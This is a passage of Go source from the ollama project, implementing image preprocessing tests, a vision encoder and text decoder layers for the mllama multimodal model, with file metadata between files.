			p:      ImageProcessor{imageSize: 2000},
			image:  image.Point{500, 1000},
			canvas: image.Point{2000, 2000},
			expect: image.Point{1000, 2000},
		},
		{
			p:      ImageProcessor{imageSize: 1000},
			image:  image.Point{4000, 3000},
			canvas: image.Point{2000, 1000},
			expect: image.Point{1333, 1000},
		},
		{
			p:      ImageProcessor{imageSize: 560},
			image:  image.Point{667, 1000},
			canvas: image.Point{1000, 1000},
			expect: image.Point{667, 1000},
		},
	}

	for _, tt := range cases {
		actual := tt.p.fitToCanvas(tt.image, tt.canvas)
		if diff := cmp.Diff(actual, tt.expect); diff != "" {
			t.Errorf("mismatch (-got +want):\n%s", diff)
		}
	}
}

// TestOptimalTiledCanvas checks canvas selection (in multiples of imageSize)
// across landscape, portrait, tiny, and oversized inputs.
func TestOptimalTiledCanvas(t *testing.T) {
	cases := []struct {
		p      ImageProcessor
		image  image.Point
		expect image.Point
	}{
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 1000},
			image:  image.Point{1024, 768},
			expect: image.Point{2000, 1000},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{1024, 768},
			expect: image.Point{1120, 1120},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{800, 600},
			expect: image.Point{1120, 1120},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{640, 480},
			expect: image.Point{1120, 560},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{320, 200},
			expect: image.Point{560, 560},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{1320, 200},
			expect: image.Point{1680, 560},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{2000, 200},
			expect: image.Point{2240, 560},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{10000, 200},
			expect: image.Point{2240, 560},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{480, 640},
			expect: image.Point{560, 1120},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{200, 320},
			expect: image.Point{560, 560},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{200, 1320},
			expect: image.Point{560, 1680},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{200, 2000},
			expect: image.Point{560, 2240},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{200, 10000},
			expect: image.Point{560, 2240},
		},
		{
			p:      ImageProcessor{maxNumTiles: 4, imageSize: 560},
			image:  image.Point{10000, 10000},
			expect: image.Point{1120, 1120},
		},
	}

	for _, tt := range cases {
		actual := tt.p.optimalTiledCanvas(tt.image)
		if diff := cmp.Diff(actual, tt.expect); diff != "" {
			t.Errorf("mismatch (-got +want):\n%s", diff)
		}
	}
}

// TestSplitToTiles verifies tile count and per-tile bounds for several grid
// shapes; only bounds are compared, not pixel contents.
func TestSplitToTiles(t *testing.T) {
	cases := []struct {
		imageMax image.Point
		numTiles image.Point
		expect   []image.Image
	}{
		{
			imageMax: image.Point{1024, 768},
			numTiles: image.Point{1, 1},
			expect:   []image.Image{image.NewRGBA(image.Rect(0, 0, 1024, 768))},
		},
		{
			imageMax: image.Point{1000, 500},
			numTiles: image.Point{2, 1},
			expect: []image.Image{
				image.NewRGBA(image.Rect(0, 0, 500, 500)),
				image.NewRGBA(image.Rect(500, 0, 1000, 500)),
			},
		},
		{
			imageMax: image.Point{1000, 1000},
			numTiles: image.Point{2, 2},
			expect: []image.Image{
				image.NewRGBA(image.Rect(0, 0, 500, 500)),
				image.NewRGBA(image.Rect(500, 0, 1000, 500)),
				image.NewRGBA(image.Rect(0, 500, 500, 1000)),
				image.NewRGBA(image.Rect(500, 500, 1000, 1000)),
			},
		},
	}

	var p ImageProcessor

	for _, tt := range cases {
		actual := p.splitToTiles(image.NewRGBA(image.Rectangle{Max: tt.imageMax}), tt.numTiles)

		if len(actual) != len(tt.expect) {
			t.Errorf("incorrect number of images '%d': expect: '%d'", len(actual), len(tt.expect))
		}

		for i := range actual {
			if actual[i].Bounds() != tt.expect[i].Bounds() {
				t.Errorf("image size incorrect: '%#v': expect: '%#v'", actual[i].Bounds(), tt.expect[i].Bounds())
			}
		}
	}
}

// TestResize checks resized bounds and the reported tile aspect ratio.
// image.Rectangle is itself an image.Image, which is why a bare Rectangle can
// be passed as the input image.
func TestResize(t *testing.T) {
	cases := []struct {
		p                 ImageProcessor
		imageMax          image.Point
		expectImage       image.Image
		expectAspectRatio image.Point
	}{
		{
			p:                 ImageProcessor{maxNumTiles: 1, imageSize: 100},
			imageMax:          image.Point{200, 200},
			expectImage:       image.NewRGBA(image.Rect(0, 0, 100, 100)),
			expectAspectRatio: image.Point{1, 1},
		},
		{
			p:                 ImageProcessor{maxNumTiles: 2, imageSize: 100},
			imageMax:          image.Point{200, 200},
			expectImage:       image.NewRGBA(image.Rect(0, 0, 100, 100)),
			expectAspectRatio: image.Point{1, 1},
		},
		{
			p:                 ImageProcessor{maxNumTiles: 4, imageSize: 560},
			imageMax:          image.Point{10, 10},
			expectImage:       image.NewRGBA(image.Rect(0, 0, 560, 560)),
			expectAspectRatio: image.Point{1, 1},
		},
		{
			p:                 ImageProcessor{maxNumTiles: 4, imageSize: 560},
			imageMax:          image.Point{2560, 1920},
			expectImage:       image.NewRGBA(image.Rect(0, 0, 1120, 840)),
			expectAspectRatio: image.Point{2, 2},
		},
		{
			p:                 ImageProcessor{maxNumTiles: 4, imageSize: 560},
			imageMax:          image.Point{1024, 768},
			expectImage:       image.NewRGBA(image.Rect(0, 0, 1024, 768)),
			expectAspectRatio: image.Point{2, 2},
		},
	}

	for _, tt := range cases {
		actualImage, actualAspectRatio := tt.p.resize(image.Rectangle{Max: tt.imageMax})

		if actualImage.Bounds() != tt.expectImage.Bounds() {
			t.Errorf("image size incorrect: '%#v': expect: '%#v'", actualImage.Bounds(), tt.expectImage.Bounds())
		}

		if actualAspectRatio != tt.expectAspectRatio {
			t.Errorf("aspect ratio incorrect: '%#v': expect: '%#v'", actualAspectRatio, tt.expectAspectRatio)
		}
	}
}

// TestPad checks that padding expands an image to an exact multiple of the
// tile size for the given tile aspect ratio.
func TestPad(t *testing.T) {
	cases := []struct {
		p           ImageProcessor
		imageMax    image.Point
		aspectRatio image.Point
		expect      image.Image
	}{
		{
			p:           ImageProcessor{maxNumTiles: 4, imageSize: 560},
			imageMax:    image.Point{1000, 667},
			aspectRatio: image.Point{2, 2},
			expect:      image.NewRGBA(image.Rect(0, 0, 1120, 1120)),
		},
	}

	for _, tt := range cases {
		actual := tt.p.pad(image.Rectangle{Max: tt.imageMax}, tt.aspectRatio)

		if actual.Bounds() != tt.expect.Bounds() {
			t.Errorf("image size incorrect: '%#v': expect: '%#v'", actual.Bounds(), tt.expect.Bounds())
		}
	}
}

// TestPackImages checks the flattened output length:
// tilesX * tilesY * channels * tileWidth * tileHeight.
func TestPackImages(t *testing.T) {
	cases := []struct {
		imageMax    image.Point
		aspectRatio image.Point
		expectVals  int
	}{
		{
			imageMax:    image.Point{1120, 1120},
			aspectRatio: image.Point{2, 2},
			expectVals:  2 * 2 * 3 * 560 * 560,
		},
		{
			imageMax:    image.Point{560, 560},
			aspectRatio: image.Point{1, 1},
			expectVals:  1 * 1 * 3 * 560 * 560,
		},
		{
			imageMax:    image.Point{1120, 560},
			aspectRatio: image.Point{1, 2},
			expectVals:  1 * 2 * 3 * 560 * 560,
		},
	}

	for _, tt := range cases {
		var p ImageProcessor

		actualVals := p.pack(image.NewRGBA(image.Rectangle{Max: tt.imageMax}), tt.aspectRatio)
		if len(actualVals) != tt.expectVals {
			t.Errorf("packed image size incorrect: '%d': expect: '%d'", len(actualVals), tt.expectVals)
		}
	}
}

// TestPreprocess exercises the end-to-end ProcessImage path and checks the
// selected aspect-ratio rank.
func TestPreprocess(t *testing.T) {
	cases := []struct {
		imageMax            image.Point
		expectAspectRatioID int
	}{
		{
			imageMax:            image.Point{10, 10},
			expectAspectRatioID: 1,
		},
		{
			imageMax:            image.Point{1024, 768},
			expectAspectRatioID: 6,
		},
	}

	p := ImageProcessor{imageSize: 560, maxNumTiles: 4}

	for _, tt := range cases {
		img, aspectRatio, err := p.ProcessImage(image.NewRGBA(image.Rectangle{Max: tt.imageMax}))
		if err != nil {
			t.Fatalf("error processing: %q", err)
		}

		if len(img) == 0 {
			t.Errorf("no image data returned")
		}

		if aspectRatio.rank != tt.expectAspectRatioID {
			// NOTE(review): %d is applied to the whole supportedAspectRatio struct
			// here (go vet's printf check would flag the argument type);
			// aspectRatio.rank was likely intended.
			t.Errorf("aspect ratio incorrect: '%d': expect: '%d'", aspectRatio, tt.expectAspectRatioID)
		}
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/model.go
model/models/mllama/model.go
package mllama

import (
	"bytes"
	"image"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/model"
	"github.com/ollama/ollama/model/input"
)

// Model ties together the mllama vision encoder, text decoder, image
// preprocessor, and the projector that maps vision states into the text
// model's hidden size.
type Model struct {
	model.Base
	model.BytePairEncoding

	*VisionModel `gguf:"v"`
	*TextModel

	Projector *nn.Linear `gguf:"mm.0"`

	ImageProcessor
}

// Layer kinds for the wrapper KV cache: cross-attention layers use the
// encoder cache, self-attention layers the causal cache (order matters —
// these index into the caches passed to NewWrapperCache below).
const (
	crossAttentionLayer = iota
	selfAttentionLayer
)

// New constructs a mllama model from GGUF metadata: tokenizer vocabulary,
// image processor, vision and text submodels, and a wrapper KV cache that
// routes each layer to the encoder or causal cache.
func New(c fs.Config) (model.Model, error) {
	m := Model{
		BytePairEncoding: model.NewBytePairEncoding(
			&model.Vocabulary{
				Values: c.Strings("tokenizer.ggml.tokens"),
				Types:  c.Ints("tokenizer.ggml.token_type"),
				Merges: c.Strings("tokenizer.ggml.merges"),
				AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true),
				BOS:    []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
				AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
				EOS: append(
					[]int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))},
					c.Ints("tokenizer.ggml.eos_token_ids")...,
				),
			},
			`(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}{1,3}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`,
		),
		ImageProcessor: newImageProcessor(c),
		VisionModel:    newVisionModel(c),
		TextModel:      newTextModel(c),
	}

	encoderCache := kvcache.NewEncoderCache()
	encoderCache.SetConfig(ml.CacheConfig{})
	m.Cache = kvcache.NewWrapperCache(encoderCache, kvcache.NewCausalCache(m.TextModel.Shift))

	return &m, nil
}

// EncodeMultimodal decodes an image, runs it through the vision encoder, and
// projects the result into cross-attention states for the text decoder.
func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) {
	// A text-only GGUF has no vision layers; reject image input in that case.
	if len(m.VisionModel.Transformer.Layers) == 0 || len(m.GlobalTransformer.Layers) == 0 {
		return nil, model.ErrNoVisionModel
	}

	image, _, err := image.Decode(bytes.NewReader(multimodalData))
	if err != nil {
		return nil, err
	}

	f32s, ratio, err := m.ImageProcessor.ProcessImage(image)
	if err != nil {
		return nil, err
	}

	if ratio.numTiles() < m.maxNumTiles {
		// Pad tiles to maxNumTiles
		// Grow allocates fresh (zeroed) capacity, so the reslice below exposes
		// zero-valued padding tiles.
		f32s = slices.Grow(f32s, m.imageSize*m.imageSize*m.numChannels*m.maxNumTiles)
		f32s = f32s[:m.imageSize*m.imageSize*m.numChannels*m.maxNumTiles]
	}

	pixelValues := ctx.Input().FromFloats(f32s, m.imageSize, m.imageSize, m.numChannels, m.maxNumTiles)

	aspectRatio := ctx.Input().FromInts([]int32{int32(ratio.rank)}, 1)

	// 1601 positions = 40x40 patches (560/14) plus the class embedding —
	// assumes the default 560/14 vision geometry; TODO confirm for other configs.
	positionIDs := ctx.Arange(0, 1601, 1, ml.DTypeI32)
	crossAttentionStates := m.VisionModel.Forward(ctx, pixelValues, positionIDs, aspectRatio)
	projectedOutputs := m.Projector.Forward(ctx, crossAttentionStates)
	return []input.Multimodal{{Tensor: projectedOutputs}}, nil
}

// PostTokenize rewrites every input carrying multimodal data to the special
// <|image|> token so the decoder knows where image content sits.
func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) {
	for i := range inputs {
		if inputs[i].Multimodal != nil {
			inputs[i].Token = 128256 // <|image|>
		}
	}

	return inputs, nil
}

// Forward runs the text decoder, threading through the most recent image's
// cross-attention states when the batch contains multimodal input.
func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
	var crossAttentionStates ml.Tensor
	if len(batch.Multimodal) > 0 {
		// Only the last image in the batch is attended to.
		crossAttentionStates = batch.Multimodal[len(batch.Multimodal)-1].Multimodal[0].Tensor
	}

	positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions))

	// TODO: attention mask, cross attention mask
	return m.TextModel.Forward(ctx, batch.Inputs, positions, batch.Outputs, crossAttentionStates, nil, m.Cache.(*kvcache.WrapperCache)), nil
}

func init() {
	model.Register("mllama", New)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/model_vision.go
model/models/mllama/model_vision.go
package mllama

import (
	"math"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
)

// The vision encoder always processes a single image at a time.
var batchSize int = 1

// VisionSelfAttention is standard multi-head self-attention for the vision
// transformer (no KV cache, no rotary embeddings).
type VisionSelfAttention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_output"`
}

// Forward applies scaled dot-product attention over hiddenState.
func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	headDim := opts.hiddenSize / opts.numHeads

	query := sa.Query.Forward(ctx, hiddenState)
	query = query.Reshape(ctx, headDim, opts.numHeads, query.Dim(1), batchSize)

	key := sa.Key.Forward(ctx, hiddenState)
	key = key.Reshape(ctx, headDim, opts.numHeads, key.Dim(1), batchSize)

	value := sa.Value.Forward(ctx, hiddenState)
	value = value.Reshape(ctx, headDim, opts.numHeads, value.Dim(1), batchSize)

	attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(headDim)), nil)
	attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), batchSize)

	return sa.Output.Forward(ctx, attention)
}

// VisionMLP is the two-layer GELU feed-forward block of each encoder layer.
type VisionMLP struct {
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
}

func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	hiddenState = mlp.Up.Forward(ctx, hiddenState).GELU(ctx)
	hiddenState = mlp.Down.Forward(ctx, hiddenState)
	return hiddenState
}

// VisionEncoderLayer is a pre-norm transformer layer with optional learned
// gates on the attention and MLP residual branches (present only in the
// global transformer's weights).
type VisionEncoderLayer struct {
	AttentionNorm *nn.LayerNorm `gguf:"attn_norm"`
	SelfAttention *VisionSelfAttention
	AttentionGate ml.Tensor `gguf:"attn_gate"`

	MLPNorm *nn.LayerNorm `gguf:"ffn_norm"`
	MLP     *VisionMLP
	MLPGate ml.Tensor `gguf:"ffn_gate"`
}

func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	residual := hiddenState

	// self attention
	hiddenState = e.AttentionNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = e.SelfAttention.Forward(ctx, hiddenState, opts)
	if e.AttentionGate != nil {
		hiddenState = hiddenState.Mul(ctx, e.AttentionGate)
	}
	hiddenState = hiddenState.Add(ctx, residual)
	residual = hiddenState

	hiddenState = e.MLPNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = e.MLP.Forward(ctx, hiddenState, opts)
	if e.MLPGate != nil {
		hiddenState = hiddenState.Mul(ctx, e.MLPGate)
	}
	hiddenState = hiddenState.Add(ctx, residual)
	return hiddenState
}

// VisionEncoder is a stack of encoder layers.
type VisionEncoder struct {
	Layers []VisionEncoderLayer
}

// Forward runs all layers and also collects the INPUT hidden state of each
// layer listed in intermediateLayersIndices (with a leading unit dimension
// added so they can be stacked later).
func (e *VisionEncoder) Forward(ctx ml.Context, hiddenState ml.Tensor, intermediateLayersIndices []int32, opts *VisionModelOptions) (ml.Tensor, []ml.Tensor) {
	var intermediateHiddenStates []ml.Tensor
	for i, layer := range e.Layers {
		if slices.Contains(intermediateLayersIndices, int32(i)) {
			intermediateHiddenStates = append(intermediateHiddenStates, hiddenState.Reshape(ctx, append([]int{1}, hiddenState.Shape()...)...))
		}

		hiddenState = layer.Forward(ctx, hiddenState, opts)
	}

	return hiddenState, intermediateHiddenStates
}

// PrecomputedAspectRatioEmbedding adds a learned per-aspect-ratio embedding
// (optionally gated) to each tile's hidden state.
type PrecomputedAspectRatioEmbedding struct {
	Embedding *nn.Embedding
	Gate      ml.Tensor `gguf:"gate"`
}

func (e *PrecomputedAspectRatioEmbedding) Forward(ctx ml.Context, hiddenState ml.Tensor, aspectRatioIDs ml.Tensor, numTiles int, opts *VisionModelOptions) ml.Tensor {
	embeddings := e.Embedding.Forward(ctx, aspectRatioIDs)
	embeddings = embeddings.Reshape(ctx, opts.hiddenSize, 1, numTiles)
	if e.Gate != nil {
		embeddings = embeddings.Mul(ctx, e.Gate)
	}

	return hiddenState.Add(ctx, embeddings)
}

// PrecomputedPositionEmbedding combines per-patch position embeddings with
// per-tile position embeddings, each behind its own optional gate.
type PrecomputedPositionEmbedding struct {
	PositionEmbedding     *nn.Embedding `gguf:"position_embd"`
	PositionEmbeddingGate ml.Tensor     `gguf:"position_embd.gate"`

	TilePositionEmbedding     *nn.Embedding `gguf:"tile_position_embd"`
	TilePositionEmbeddingGate ml.Tensor     `gguf:"tile_position_embd.gate"`
}

func (e *PrecomputedPositionEmbedding) Forward(ctx ml.Context, hiddenState, positionIDs, aspectRatioIDs ml.Tensor, numPositions, numTiles int, opts *VisionModelOptions) ml.Tensor {
	positionEmbedding := e.PositionEmbedding.Forward(ctx, positionIDs)
	if e.PositionEmbeddingGate != nil {
		positionEmbedding = positionEmbedding.Mul(ctx, e.PositionEmbeddingGate)
	}

	hiddenState = hiddenState.Add(ctx, positionEmbedding)

	tilePositionEmbedding := e.TilePositionEmbedding.Forward(ctx, aspectRatioIDs)
	tilePositionEmbedding = tilePositionEmbedding.Reshape(ctx, opts.hiddenSize, numPositions, numTiles)
	if e.TilePositionEmbeddingGate != nil {
		tilePositionEmbedding = tilePositionEmbedding.Mul(ctx, e.TilePositionEmbeddingGate)
	}

	return hiddenState.Add(ctx, tilePositionEmbedding)
}

// VisionModelOptions carries hyperparameters shared by all vision submodules.
type VisionModelOptions struct {
	hiddenSize, numHeads int
	imageSize, patchSize int
	eps                  float32

	intermediateLayersIndices []int32
}

// VisionModel is the mllama vision tower: patch embedding, a local
// transformer, and a global transformer, with tile/position embeddings.
type VisionModel struct {
	PatchEmbeddings *nn.Conv2D `gguf:"patch_embd"`

	PreTilePositionEmbedding  *PrecomputedAspectRatioEmbedding `gguf:"pre_tile_position_embd"`
	PostTilePositionEmbedding *PrecomputedAspectRatioEmbedding `gguf:"post_tile_position_embd"`
	PositionEmbedding         *PrecomputedPositionEmbedding

	PreLayerNorm   *nn.LayerNorm `gguf:"pre_ln"`
	PostLayerNorm  *nn.LayerNorm `gguf:"post_ln"`
	ClassEmbedding ml.Tensor     `gguf:"class_embd"`

	Transformer       *VisionEncoder `gguf:"blk"`
	GlobalTransformer *VisionEncoder `gguf:"global.blk"`

	*VisionModelOptions
}

// Forward encodes tiled pixel values into cross-attention states: the global
// transformer output concatenated with selected intermediate layer states.
func (m *VisionModel) Forward(ctx ml.Context, pixelValues, positionIDs, aspectRatioIDs ml.Tensor) ml.Tensor {
	numPatches := (m.imageSize / m.patchSize) * (m.imageSize / m.patchSize)
	numPositions := numPatches
	if m.ClassEmbedding != nil {
		numPositions++
	}

	numTiles := pixelValues.Dim(3)

	hiddenState := m.PatchEmbeddings.Forward(ctx, pixelValues, m.patchSize, m.patchSize, 0, 0, 1, 1)
	hiddenState = hiddenState.Reshape(ctx, numPatches, m.hiddenSize, numTiles)
	hiddenState = hiddenState.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx)

	hiddenState = m.PreTilePositionEmbedding.Forward(ctx, hiddenState, aspectRatioIDs, numTiles, m.VisionModelOptions)
	// Prepend the class embedding to every tile's patch sequence.
	hiddenState = m.ClassEmbedding.Repeat(ctx, 2, numTiles).Concat(ctx, hiddenState, 1)

	hiddenState = m.PositionEmbedding.Forward(ctx, hiddenState, positionIDs, aspectRatioIDs, numPositions, numTiles, m.VisionModelOptions)
	hiddenState = m.PreLayerNorm.Forward(ctx, hiddenState, m.eps)

	// NOTE(review): `8 - (x%8)%8` reduces to `8 - x%8`, which is 8 (not 0) when
	// x is already a multiple of 8; `(8 - x%8) % 8` was likely intended. The
	// extra padding is stripped again by the negative Pad calls below, so the
	// final output should be unaffected — confirm before changing.
	numPaddingPatches := 8 - (hiddenState.Dim(1)%8)%8
	hiddenState = hiddenState.Pad(ctx, 0, numPaddingPatches, 0, 0)

	hiddenState = hiddenState.Reshape(ctx, hiddenState.Dim(0), hiddenState.Dim(1)*hiddenState.Dim(2), batchSize)
	hiddenState, intermediateHiddenStates := m.Transformer.Forward(ctx, hiddenState, m.intermediateLayersIndices, m.VisionModelOptions)

	hiddenState = m.PostLayerNorm.Forward(ctx, hiddenState, m.eps)

	hiddenState = hiddenState.Reshape(ctx, m.hiddenSize, numPositions+numPaddingPatches, numTiles, batchSize)
	hiddenState = m.PostTilePositionEmbedding.Forward(ctx, hiddenState, aspectRatioIDs, numTiles, m.VisionModelOptions)

	hiddenState = hiddenState.Reshape(ctx, m.hiddenSize, numTiles*(numPositions+numPaddingPatches), batchSize)
	hiddenState, _ = m.GlobalTransformer.Forward(ctx, hiddenState, nil, m.VisionModelOptions)

	// Stack the captured intermediate states along a new leading axis, then
	// remove the padding patches from both tensors before concatenating.
	// NOTE(review): this indexes intermediateHiddenStates[0] unconditionally,
	// so it assumes intermediate_layers_indices is non-empty in the GGUF.
	hiddenStates := intermediateHiddenStates[0].Stack(ctx, 0, intermediateHiddenStates[1:]...)
	hiddenStates = hiddenStates.Reshape(ctx, len(intermediateHiddenStates)*m.hiddenSize, numPositions+numPaddingPatches, numTiles, batchSize)
	hiddenStates = hiddenStates.Pad(ctx, 0, -numPaddingPatches, 0, 0)

	hiddenState = hiddenState.Reshape(ctx, m.hiddenSize, numPositions+numPaddingPatches, numTiles, batchSize)
	hiddenState = hiddenState.Pad(ctx, 0, -numPaddingPatches, 0, 0)
	return hiddenState.Concat(ctx, hiddenStates, 0)
}

// newVisionModel builds the vision tower from GGUF metadata.
func newVisionModel(c fs.Config) *VisionModel {
	return &VisionModel{
		Transformer:       &VisionEncoder{Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count"))},
		GlobalTransformer: &VisionEncoder{Layers: make([]VisionEncoderLayer, c.Uint("vision.global.block_count"))},

		VisionModelOptions: &VisionModelOptions{
			hiddenSize: int(c.Uint("vision.embedding_length")),
			numHeads:   int(c.Uint("vision.attention.head_count")),

			imageSize: int(c.Uint("vision.image_size")),
			patchSize: int(c.Uint("vision.patch_size")),

			eps: c.Float("vision.attention.layer_norm_epsilon"),

			intermediateLayersIndices: c.Ints("vision.intermediate_layers_indices"),
		},
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/model_text.go
model/models/mllama/model_text.go
package mllama

import (
	"math"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/ml/nn/rope"
)

// TextSelfAttention is causal self-attention with rotary position embeddings
// (optionally frequency-scaled via RopeFactors).
type TextSelfAttention struct {
	Query       *nn.Linear `gguf:"attn_q"`
	Key         *nn.Linear `gguf:"attn_k"`
	Value       *nn.Linear `gguf:"attn_v"`
	Output      *nn.Linear `gguf:"attn_output"`
	RopeFactors ml.Tensor  `gguf:"rope_freqs.weight"`
}

func (sa *TextSelfAttention) Forward(ctx ml.Context, hiddenState, positions ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor {
	batchSize := hiddenState.Dim(1)
	headDim := opts.hiddenSize / opts.numHeads

	query := sa.Query.Forward(ctx, hiddenState)
	query = query.Reshape(ctx, headDim, opts.numHeads, batchSize)
	query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, sa.RopeFactors)

	key := sa.Key.Forward(ctx, hiddenState)
	key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize)
	key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, sa.RopeFactors)

	value := sa.Value.Forward(ctx, hiddenState)
	value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize)

	scaleFactor := 1.0 / math.Sqrt(float64(headDim))
	attention := nn.Attention(ctx, query, key, value, scaleFactor, cache)
	attention = attention.Reshape(ctx, opts.hiddenSize, batchSize)

	return sa.Output.Forward(ctx, attention)
}

// Shift re-applies rotary embeddings to cached keys when the KV cache slides.
func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) {
	// This will only get called for layers in the cache, which are just the self attention layers
	if layer, ok := m.Transformer.Layers[layer].(*TextSelfAttentionDecoderLayer); ok {
		return m.applyRotaryPositionEmbeddings(ctx, key, shift, layer.SelfAttention.RopeFactors), nil
	}

	return key, nil
}

// TextMLP is the gated feed-forward block (SiLU-activated gate fused with the
// up projection, then projected back down).
type TextMLP struct {
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
	Gate *nn.Linear `gguf:"ffn_gate"`
}

func (mlp *TextMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextModelOptions) ml.Tensor {
	hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState))
	return mlp.Down.Forward(ctx, hiddenState)
}

// TextSelfAttentionDecoderLayer is a standard pre-norm decoder layer.
type TextSelfAttentionDecoderLayer struct {
	AttentionNorm *nn.RMSNorm `gguf:"attn_norm"`
	SelfAttention *TextSelfAttention

	MLPNorm *nn.RMSNorm `gguf:"ffn_norm"`
	MLP     *TextMLP
}

func (d *TextSelfAttentionDecoderLayer) Forward(ctx ml.Context, hiddenState, positions, outputs, _, _ ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor {
	residual := hiddenState

	hiddenState = d.AttentionNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = d.SelfAttention.Forward(ctx, hiddenState, positions, cache, opts)

	// In the final layer (outputs != nil), optimize by pruning to just the token positions
	// we need logits for.
	if outputs != nil {
		hiddenState = hiddenState.Rows(ctx, outputs)
		residual = residual.Rows(ctx, outputs)
	}

	hiddenState = hiddenState.Add(ctx, residual)
	residual = hiddenState

	hiddenState = d.MLPNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = d.MLP.Forward(ctx, hiddenState, opts)
	return hiddenState.Add(ctx, residual)
}

// TextCrossAttention attends from text tokens to the vision encoder's
// cross-attention states, with RMS-normalized queries and keys.
type TextCrossAttention struct {
	QueryNorm *nn.RMSNorm `gguf:"cross_attn_q_norm"`
	Query     *nn.Linear  `gguf:"cross_attn_q_proj"`
	KeyNorm   *nn.RMSNorm `gguf:"cross_attn_k_norm"`
	Key       *nn.Linear  `gguf:"cross_attn_k_proj"`
	Value     *nn.Linear  `gguf:"cross_attn_v_proj"`
	Output    *nn.Linear  `gguf:"cross_attn_o_proj"`
}

func (ca *TextCrossAttention) Forward(ctx ml.Context, hiddenState, crossAttentionStates ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor {
	batchSize := hiddenState.Dim(1)
	headDim := opts.hiddenSize / opts.numHeads

	query := ca.Query.Forward(ctx, hiddenState)
	query = query.Reshape(ctx, headDim, opts.numHeads, batchSize)
	query = ca.QueryNorm.Forward(ctx, query, opts.eps)

	var key, value ml.Tensor
	if crossAttentionStates != nil {
		// Fresh image: project its states to K/V and store them in the encoder
		// cache for subsequent decode steps.
		numVisionTokens, numTiles := crossAttentionStates.Dim(1), crossAttentionStates.Dim(2)

		key = ca.Key.Forward(ctx, crossAttentionStates)
